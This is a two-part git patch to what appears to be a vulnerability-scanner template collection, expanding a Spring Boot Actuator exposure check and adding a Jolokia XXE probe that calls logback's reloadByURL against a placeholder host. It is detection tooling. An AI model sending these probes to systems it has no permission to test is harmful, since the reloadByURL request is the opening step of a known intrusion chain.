From c167a31784ac843467573380774aaff5ba36f0a2 Mon Sep 17 00:00:00 2001
From: dw1 <dwi.siswanto98@gmail.com>
Date: Thu, 2 Jul 2020 23:14:39 +0700
Subject: [PATCH 1/2] :wrench: Add path requests & matchers for Springboot
 Actuators

---
 .../springboot-detect.yaml                    | 76 ++++++++++++++-----
 1 file changed, 57 insertions(+), 19 deletions(-)

diff --git a/security-misconfiguration/springboot-detect.yaml b/security-misconfiguration/springboot-detect.yaml
index 80bbdcce12..06b35ea211 100644
--- a/security-misconfiguration/springboot-detect.yaml
+++ b/security-misconfiguration/springboot-detect.yaml
@@ -2,38 +2,74 @@ id: springboot-actuators
 
 info:
   name: Detect the exposure of Springboot Actuators
-  author: that_juan_
+  author: that_juan_ & dwisiswant0
   severity: medium
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/trace"
-      - "{{BaseURL}}/loggers"
-      - "{{BaseURL}}/autoconfig"
-      - "{{BaseURL}}/threaddump"
-      - "{{BaseURL}}/env"
-      - "{{BaseURL}}/management"
-      - "{{BaseURL}}/dump"
-      - "{{BaseURL}}/configprops"
-      - "{{BaseURL}}/mappings"
-      - "{{BaseURL}}/auditevents"
-      - "{{BaseURL}}/beans"
-      - "{{BaseURL}}/cloudfoundryapplication"
-      - "{{BaseURL}}//jolokia"
       - "{{BaseURL}}/actuator"
       - "{{BaseURL}}/actuator/auditevents"
+      - "{{BaseURL}}/actuator/auditLog"
       - "{{BaseURL}}/actuator/beans"
-      - "{{BaseURL}}/actuator/health"
+      - "{{BaseURL}}/actuator/caches"
       - "{{BaseURL}}/actuator/conditions"
       - "{{BaseURL}}/actuator/configprops"
-      - "{{BaseURL}}/actuator/env"
+      - "{{BaseURL}}/actuator/configurationMetadata"
       - "{{BaseURL}}/actuator/dump"
-      - "{{BaseURL}}/actuator/threaddump"
+      - "{{BaseURL}}/actuator/env"
+      - "{{BaseURL}}/actuator/events"
+      - "{{BaseURL}}/actuator/exportRegisteredServices"
+      - "{{BaseURL}}/actuator/features"
       - "{{BaseURL}}/actuator/flyway"
+      - "{{BaseURL}}/actuator/health"
+      - "{{BaseURL}}/actuator/healthcheck"
+      - "{{BaseURL}}/actuator/heapdump"
+      - "{{BaseURL}}/actuator/httptrace"
+      - "{{BaseURL}}/actuator/hystrix.stream"
+      - "{{BaseURL}}/actuator/info"
       - "{{BaseURL}}/actuator/integrationgraph"
-      - "{{BaseURL}}//actuator/management"
-      - "{{BaseURL}}//actuator/jolokia"
+      - "{{BaseURL}}/actuator/jolokia"
+      - "{{BaseURL}}/actuator/liquibase"
+      - "{{BaseURL}}/actuator/logfile"
+      - "{{BaseURL}}/actuator/loggers"
+      - "{{BaseURL}}/actuator/loggingConfig"
+      - "{{BaseURL}}/actuator/management"
+      - "{{BaseURL}}/actuator/mappings"
+      - "{{BaseURL}}/actuator/metrics"
+      - "{{BaseURL}}/actuator/refresh"
+      - "{{BaseURL}}/actuator/registeredServices"
+      - "{{BaseURL}}/actuator/releaseAttributes"
+      - "{{BaseURL}}/actuator/resolveAttributes"
+      - "{{BaseURL}}/actuator/scheduledtasks"
+      - "{{BaseURL}}/actuator/sessions"
+      - "{{BaseURL}}/actuator/shutdown"
+      - "{{BaseURL}}/actuator/springWebflow"
+      - "{{BaseURL}}/actuator/sso"
+      - "{{BaseURL}}/actuator/ssoSessions"
+      - "{{BaseURL}}/actuator/statistics"
+      - "{{BaseURL}}/actuator/status"
+      - "{{BaseURL}}/actuator/threaddump"
+      - "{{BaseURL}}/actuator/trace"
+      - "{{BaseURL}}/auditevents"
+      - "{{BaseURL}}/autoconfig"
+      - "{{BaseURL}}/beans"
+      - "{{BaseURL}}/cloudfoundryapplication"
+      - "{{BaseURL}}/configprops"
+      - "{{BaseURL}}/dump"
+      - "{{BaseURL}}/env"
+      - "{{BaseURL}}/health"
+      - "{{BaseURL}}/heapdump"
+      - "{{BaseURL}}/hystrix.stream"
+      - "{{BaseURL}}/info"
+      - "{{BaseURL}}/jolokia"
+      - "{{BaseURL}}/jolokia/list"
+      - "{{BaseURL}}/loggers"
+      - "{{BaseURL}}/management"
+      - "{{BaseURL}}/mappings"
+      - "{{BaseURL}}/metrics"
+      - "{{BaseURL}}/threaddump"
+      - "{{BaseURL}}/trace"
     matchers:
       - type: regex
         part: body
@@ -44,6 +80,8 @@ requests:
           - "system"
           - "database"
           - "cron"
+          - "reloadByURL"
+          - "JMXConfigurator"
         condition: or
       - type: status
         status:

From ecd295aff49fc0eb836b77a2a9297b83c6af4110 Mon Sep 17 00:00:00 2001
From: dw1 <dwi.siswanto98@gmail.com>
Date: Thu, 2 Jul 2020 23:15:33 +0700
Subject: [PATCH 2/2] :fire: Add Springboot Actuators (Jolokia) XXE
 Vulnerability

---
 .../springboot-actuators-jolokia-xxe.yaml     | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 vulnerabilities/springboot-actuators-jolokia-xxe.yaml

diff --git a/vulnerabilities/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot-actuators-jolokia-xxe.yaml
new file mode 100644
index 0000000000..31723c324d
--- /dev/null
+++ b/vulnerabilities/springboot-actuators-jolokia-xxe.yaml
@@ -0,0 +1,28 @@
+id: springboot-actuators-jolokia-xxe
+
+info:
+  name: Spring Boot Actuators (Jolokia) XXE
+  author: dwisiswant0
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
+      - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "http:\\/\\/nonexistent:31337\\/logback.xml"
+          - "reloadByURL"
+          - "JoranException"
+        condition: and
+        part: body
+      - type: word
+        words:
+          - "X-Application-Context"
+        part: header
\ No newline at end of file